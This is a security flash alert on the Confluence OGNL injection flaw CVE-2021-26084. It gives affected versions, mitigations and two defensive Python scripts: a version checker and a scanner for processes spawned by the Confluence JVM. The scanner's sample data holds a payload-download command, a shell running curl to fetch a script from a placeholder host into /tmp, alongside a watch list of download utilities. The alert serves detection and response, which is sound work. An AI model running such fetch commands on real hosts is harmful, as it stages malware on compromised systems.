Atlassian Confluence Server and Data Center RCE Vulnerability

3 September, 2021

Executive Summary

Atlassian Confluence and the U.S. Cyber Command have issued a security advisory regarding an OGNL injection vulnerability that exists in multiple versions of the Confluence Server and Data Center products.

This Remote Code Execution (RCE) vulnerability could allow authenticated users, and in some cases unauthenticated users, to execute arbitrary code on a Confluence Server or Data Center instance. Exploits have been observed in the wild and fixes have been provided. This does not affect Confluence Cloud customers.


Details

CVE-2021-26084 – Confluence Server Security Advisory

This vulnerability exists in on-premises Confluence Server and Data Center instances and can be reached by non-administrator users or, potentially, by unauthenticated users if the “Allow people to sign up to create their account” option is enabled.

To check whether this option is enabled, go to:
COG > User Management > User Signup Options

Affected Versions

Before version 6.13.23
From version 6.14.0 before 7.4.11
From version 7.5.0 before 7.11.6
From version 7.12.0 before 7.12.5
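The following version-range check is an added example (not Atlassian's code and not part of the advisory): it encodes the four affected ranges listed above and reports whether a given Confluence Server or Data Center version falls inside one of them. The "fixed version" it returns is simply the first version in the matching branch that the advisory no longer lists as affected; confirm against the release notes before acting on it.

```python
"""Check a Confluence Server / Data Center version against the affected
ranges listed in the CVE-2021-26084 advisory.

Added example, not Atlassian's code. The ranges below are copied from the
advisory's "Affected Versions" list: lower bound inclusive (None = any
earlier version), upper bound exclusive.
"""
from typing import Optional, Tuple

AFFECTED_RANGES = [
    (None, "6.13.23"),      # before 6.13.23
    ("6.14.0", "7.4.11"),   # from 6.14.0 before 7.4.11
    ("7.5.0", "7.11.6"),    # from 7.5.0 before 7.11.6
    ("7.12.0", "7.12.5"),   # from 7.12.0 before 7.12.5
]


def parse_version(version: str) -> Tuple[int, ...]:
    """'7.4.11' -> (7, 4, 11). A suffix such as '-rc1' is ignored (assumption)."""
    core = version.strip().split("-")[0]
    return tuple(int(part) for part in core.split("."))


def _in_range(v: Tuple[int, ...], low: Optional[str], high: str) -> bool:
    # Tuple comparison gives the usual lexicographic version ordering.
    above_low = low is None or v >= parse_version(low)
    return above_low and v < parse_version(high)


def is_affected(version: str) -> bool:
    """True if the version falls inside any advisory range."""
    v = parse_version(version)
    return any(_in_range(v, low, high) for low, high in AFFECTED_RANGES)


def fixed_version_in_branch(version: str) -> Optional[str]:
    """Upper bound of the matching range, i.e. the first version in that
    branch the advisory no longer lists as affected; None if not affected."""
    v = parse_version(version)
    for low, high in AFFECTED_RANGES:
        if _in_range(v, low, high):
            return high
    return None


if __name__ == "__main__":
    import sys
    for arg in sys.argv[1:] or ["6.13.22", "7.4.10", "7.12.5"]:
        status = "AFFECTED" if is_affected(arg) else "not affected"
        fix = fixed_version_in_branch(arg)
        print(f"{arg}: {status}" + (f" (branch fix: {fix})" if fix else ""))
```

Run it with one or more version strings as arguments, e.g. the value shown in the Confluence administration console, and it prints whether each is inside an affected range.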

Proof of Concept code has been publicly available since August 31, 2021 and active exploitation has been observed since September 2, 2021.


Recommendations

Atlassian Confluence recommends upgrading to the latest Long Term Support release, which can be found here. More information on these fixes can be found in the Sources section at the bottom of this Flash Alert.

If it is not possible to upgrade at this time, a temporary workaround has been provided and can be found in the “Mitigation” section of the Confluence Security Advisory.

If a potential compromise has occurred, the following should be investigated:

Curl Utility – The Curl utility is often used by malicious actors to download additional payloads on compromised Linux systems.

It may also be necessary to identify any recent processes that have been launched by the Atlassian Confluence server app.
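As an added example of the two investigation steps above (this is not the advisory's or Atlassian's code), the script below walks a `ps` snapshot, locates the Confluence server JVM, lists every process descended from it, and raises the severity of any that run or wrap curl or wget. The sample snapshot is constructed; the JVM is recognised by the `org.apache.catalina.startup.Bootstrap` class plus a `confluence` path in its arguments, which is an assumption about a default installation.

```python
"""List processes launched by the Confluence server JVM from a ps snapshot
and flag download utilities among them.

Added example, not the advisory's code. Run without arguments to scan a
constructed sample; pass --live to read `ps -eo pid,ppid,user,args` on a
Linux host.
"""
import subprocess
import sys
from typing import Dict, List, Tuple

# Utilities the advisory names as commonly used to fetch payloads, plus the
# shells that typically wrap them. Assumed list; extend for your environment.
DOWNLOADERS = {"curl", "wget"}
SHELLS = {"sh", "bash", "dash"}

# Constructed sample of `ps -eo pid,ppid,user,args` output. PIDs, the host
# 203.0.113.5 (documentation range) and paths are made up for illustration.
SAMPLE_PS = """\
  PID  PPID USER     COMMAND
    1     0 root     /sbin/init
  845     1 root     /usr/sbin/sshd -D
 1203     1 confluence /opt/atlassian/confluence/jre/bin/java -Dcatalina.base=/opt/atlassian/confluence org.apache.catalina.startup.Bootstrap start
 1310  1203 confluence /opt/atlassian/confluence/jre/bin/java -jar /opt/atlassian/confluence/synchrony/synchrony-standalone.jar
 2231  1203 confluence /bin/sh -c curl -s http://203.0.113.5/x.sh -o /tmp/x.sh
 2232  2231 confluence curl -s http://203.0.113.5/x.sh -o /tmp/x.sh
 2240   845 admin    bash
"""

Proc = Tuple[int, str, str]  # (ppid, user, args)


def parse_ps(text: str) -> Dict[int, Proc]:
    """Parse ps output (header line skipped) into {pid: (ppid, user, args)}."""
    procs: Dict[int, Proc] = {}
    for line in text.splitlines()[1:]:
        parts = line.split(None, 3)
        if len(parts) < 4:
            continue
        procs[int(parts[0])] = (int(parts[1]), parts[2], parts[3])
    return procs


def find_confluence_pids(procs: Dict[int, Proc]) -> List[int]:
    """PIDs of Confluence server JVMs (assumed Tomcat Bootstrap + confluence path)."""
    return sorted(pid for pid, (_, _, args) in procs.items()
                  if "org.apache.catalina.startup.Bootstrap" in args
                  and "confluence" in args)


def descendants(procs: Dict[int, Proc], root: int) -> List[int]:
    """All PIDs below `root` in the parent tree, ascending."""
    found, stack = [], [root]
    while stack:
        current = stack.pop()
        for pid, (ppid, _, _) in procs.items():
            if ppid == current:
                found.append(pid)
                stack.append(pid)
    return sorted(found)


def _basename(args: str) -> str:
    return args.split()[0].rsplit("/", 1)[-1]


def _severity(args: str) -> str:
    exe = _basename(args)
    tokens = {tok.rsplit("/", 1)[-1] for tok in args.split()}
    if exe in DOWNLOADERS or tokens & DOWNLOADERS:
        return "high"      # a download utility, or a shell wrapping one
    if exe in SHELLS:
        return "medium"    # a bare shell under the JVM deserves a look
    return "info"          # still report it: the JVM rarely spawns children


def confluence_children(procs: Dict[int, Proc]) -> List[dict]:
    """Every process descended from a Confluence JVM, with a severity label."""
    findings = []
    for root in find_confluence_pids(procs):
        for pid in descendants(procs, root):
            ppid, user, args = procs[pid]
            findings.append({"pid": pid, "ppid": ppid, "user": user,
                             "exe": _basename(args), "severity": _severity(args),
                             "args": args})
    return findings


if __name__ == "__main__":
    if "--live" in sys.argv:
        snapshot = subprocess.run(["ps", "-eo", "pid,ppid,user,args"],
                                  capture_output=True, text=True, check=True).stdout
    else:
        snapshot = SAMPLE_PS
    for f in confluence_children(parse_ps(snapshot)):
        print(f"[{f['severity']:>6}] pid={f['pid']} ppid={f['ppid']} "
              f"user={f['user']} {f['args']}")
```

A snapshot only shows what is running now; short-lived downloads will already have exited, so pair this with process auditing (auditd or EDR telemetry) to see what the JVM launched in the days around the exploitation dates given above.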

Again, Confluence Cloud customers are not affected.


SOD Actions

If your organization possesses on-premises Confluence Server or Data Center instances, we request that you provide us with the asset IP and any/all identifying information.

The Security On-Demand Threat Recon Unit will continue to monitor these events and provide relevant updates. SOD is not affected by this vulnerability.

If you have any questions about this alert, please contact your Security On-Demand Customer Success Manager.


Sources

CISA Security Advisory

Confluence Security Advisory – OGNL Vulnerability Security Advisory

Confluence Release Notes – Long Term Support Release Notes and Links

Confluence Server and Data Center Download – Long Term Support Download Center

CVE-2021-26084 – Atlassian Issue Tracker

MITRE CVE-2021-26084 – Confluence Server and Data Center Vulnerability

NIST CVE-2021-26084 – Confluence Server and Data Center Vulnerability

CVE-2021-26084 – Rapid7 Analysis, Triggers and Vulnerability Checks

Confluence RCE – GitHub Write-up and POC